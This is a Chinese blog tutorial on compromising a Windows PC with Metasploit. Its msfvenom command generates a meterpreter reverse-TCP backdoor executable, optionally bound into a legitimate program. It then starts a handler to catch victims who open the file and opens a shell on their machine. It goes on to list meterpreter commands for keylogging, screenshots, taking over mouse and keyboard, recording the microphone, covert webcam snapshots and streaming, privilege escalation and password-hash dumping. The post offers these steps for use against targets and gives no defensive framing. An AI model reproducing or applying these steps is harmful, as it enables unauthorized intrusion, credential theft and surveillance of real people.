利用msf入侵电脑

版权声明:本文为博主原创文章,遵循 CC 4.0 by-sa 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq742762377/article/details/82145762

需要的工具

msfvenom、msfconsole

执行命令:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<本地IP> LPORT=<本地端口>  -f exe -o hacker.exe

 

参数:

-p payloads

-f 输出格式

-o 输入地址

-e 编码方式(msfvenom -l -encoder 可以查看能使用的编码)

-x | -k 绑定程序 (例如 –x C:\nomal.exe –k –f exe –o C:\shell.exe

即生成后门文件 hacker.exe

把它放到目标电脑上面(这里我放在WIN10 上面)

 

执行命令:(linux上运行需要)

chmod 777 hacker.exe (给予权限)

 

执行命令:

msfconsole (运行msfconsole)

msf > use exploit/multi/handler (选择模块)

msf exploit(handler) > exploit -z -j (后台执行)

这个时候等待目标打开我们的hacker.exe,打开即上钩了

msf exploit(handler) > sessions(查看上钩的用户)

msf exploit(handler) > sessions -i 1(选择需要攻击的用户,这里选择第 1 个)

meterpreter > shell (执行shell)

 

进入meterpreter之后即可进行一些相关木马操作

首先可以查看帮助文档,命令“help”,挑常用操作来讲↓↓↓

------------------------------------------------------------------------------------------------

用户操作:Stdapi: User interface Commands(用户接口命令)

enumdesktops    -->列出所有可访问的桌面和窗口站(窗体列表)
getdesktop      -->得到当前的Meterpreter桌面

idletime        -->返回秒远程用户已经闲置数量

keyscan_start   -->开始捕获击键(开始键盘记录)
keyscan_dump    -->转储按键缓冲(下载键盘记录)
keyscan_stop    -->停止捕获击键(停止键盘记录)

PS:键盘记录注意点,先开始,后下载,再结束,否则会出错


screenshot      -->抓取交互式桌面截图(当前操作界面截图一张)
setdesktop      -->改变meterpreters当前桌面

uictl           -->控制一些用户界面组件(获取键盘、鼠标控制权)
使用uictl -h 查看帮助(打开/关闭,键盘/鼠标)


摄像头:Stdapi: Webcam Commands(摄像头命令)

record_mic       -->X秒从默认的麦克风record_mic音频记录(音频录制)


webcam_chat      -->开始视频聊天(视频,对方会有弹窗)
webcam_list      -->单摄像头(查看摄像头列表)


webcam_snap      -->采取快照从指定的摄像头(摄像头拍摄一张照片)
webcam_stream    -->播放视频流从指定的摄像头(开启摄像头监控)


其他命令操作

getsystem        -->获取高权限
 
hashdump         -->获取当前用户hash

 

监控目标摄像头:

 

 

展开阅读全文

没有更多推荐了,返回首页